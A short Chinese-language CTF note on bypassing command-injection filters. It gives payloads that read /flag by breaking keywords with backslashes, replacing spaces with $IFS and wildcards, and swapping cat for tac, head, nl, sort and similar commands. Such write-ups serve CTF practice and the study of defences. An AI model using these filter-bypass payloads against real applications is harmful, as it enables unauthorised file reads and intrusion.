这个绕过方法有好多
我的payload:
`ca\t$IFS$9/fla\g$IFS>1.txt`
ps:用\截断关键字,用$IFS代替空格,用$9做垃圾数据。读取flag保存到1.txt
其他的payload:
`head$IFS$9/fla?$IFS$9>1.txt`
ps:用head代替cat
详情可见:CTF中的命令执行绕过方式
tac:从最后一行倒序显示内容,并将所有内容输出
more:根据窗口大小,一页一页的现实文件内容
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head:只显示头几行
tail:只显示最后几行
nl:类似于cat -n,显示时输出行号
tailf:类似于tail -f
sort%20/flag 读文件
dir来查看当前目录文件
原文:https://www.cnblogs.com/murkuo/p/14877097.html